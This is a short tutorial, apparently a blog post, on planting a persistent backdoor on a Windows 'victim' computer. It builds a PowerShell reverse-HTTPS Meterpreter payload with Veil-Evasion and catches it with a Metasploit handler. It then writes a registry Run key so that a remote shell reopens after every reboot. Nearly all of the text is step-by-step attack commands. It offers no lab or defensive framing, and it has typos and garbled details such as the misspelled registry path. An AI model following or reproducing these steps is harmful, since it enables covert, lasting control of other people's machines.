Auto Exploit Windows Using Powershell

Auto Exploit Windows Using Powershell 

 

Auto exloit is a backdoor created in metasploit which will remain open despite the victim's computer is shut down or restarted. many uses of auto exploit, one of them is meterpreter new session will open when the victim computer is turned on, making it easier to process in a computer hacking victim.

we will inject registry victim using powershell. powershell payload created using the veil-evasion.

First open Veil-Evasion. with ./Veil-Evasion.py

 Select powershell/meterpreter/rev_https. type use 23

Check your local ip. With type ifconfig

set LHOST "Your Local IP". exsample = set LHOST 192.168.10.211

Set LPORT 9999

info

Generate and create name with backdoor

Press enter

Open metasploit with type msfconsole in terminal

use exploit/multi/handler

set payload windows/meterpreter/reverse_https

set LHOST "Your Local IP". exsampe= set LHOST 192.168.10.211

set LPORT 9999

exploit

Copy backdoor.bat on victim. And run backdoor.bat on victim machine.

Meterpreter session Opened

You can see the location backdoor.bat on the Desktop victim. and if you want to put backdoor.bat in another folder that is not a problem.

reg setval -k HKLM\\Software\\Microsoft\\Windows\\CurentVersion\\Run -v 9999 -d "location a backdoor.bat"

exsample = reg setval -k HKLM\\Software\\Microsoft\\Windows\\CurentVersion\\Run -v 9999 -d c:\\Users\\HRD-Andim\\Desktop\\backdoor.bat

You can check on registry victim machine. you create folder on victim machine with name 9999

reg queryval -k  HKLM\\Software\\Microsoft\\Windows\\CurentVersion\\Run -v 9999

Restart the victim machine. and mesterpreter session 2 will be opened.

Then finish.  backdoor will always be open despite the victim turning off his computer

Thanks.. :)

Related Posts:

Tweet